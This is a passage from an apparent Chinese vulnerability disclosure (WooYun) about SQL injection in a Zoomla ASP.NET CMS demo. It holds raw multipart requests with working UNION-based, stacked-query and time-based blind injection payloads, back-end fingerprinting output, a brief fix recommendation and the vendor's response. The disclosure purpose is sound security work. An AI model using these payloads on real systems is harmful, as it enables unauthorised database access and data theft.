e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIqyTljYPkuIfnuqfmlbDmja7lupPotJ/ovb3mtYvor5XnuqfliKtkAgUPDxYCHwIFDzE4MC4xNTMuMjA1LjI1M2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgoPZBYOZg9kFgJmDxUBAjQyZAIBDw8WAh8CBQI0MmRkAgIPZBYCZg8VARMyMDE0LTA4LTAzIDA0OjIzOjU1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUNMTQuMTA3LjIwNS45MWRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgsPDxYCHgdWaXNpYmxlaGRkAgwPZBYCZg9kFgQCAQ8PFgIfAgUCMzJkZAIWDxAPFgIfA2dkEBUEATEBMgEzATQVBAExATIBMwE0FCsDBGdnZ2cWAWZkGAEFEWN0bDAwJENvbnRlbnQkRWd2DzwrAAwDBhUBAklEBxQrAAoUKwABAiEUKwABAiIUKwABAiMUKwABAiQUKwABAiUUKwABAiYUKwABAicUKwABAigUKwABAikUKwABAioIAgRkmIUN+QajY8XCYHl94YGf479+Juhbv5otzNBlCeQ9aRk=
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%'; WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'demozoomla_f'


c.商城管理的明细记录处:

zoomla1.jpg


zoomla2.jpg


d.企业黄页的黄页内容管理的搜索处

zoomla1.jpg


e.企业黄页的黄页标签管理的搜索处

zoomla1.jpg

修复方案:

验证码设计错误
修复搜索型注入点

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-06 13:19

厂商回复:

我们的后台安全机制通过以下几个方式来保障:
1、三次登陆出现验证码,即贵文所呈问题。
2、安全码,默认不启用,可以启用之加强安全,预置的安全码。
3、可变更的后台路径,对于demo我们是开放后台路径,而后台事实是一个变更的值。
感谢贵文反馈的安全问题,我们将加强并尽快改进。

最新状态:

暂无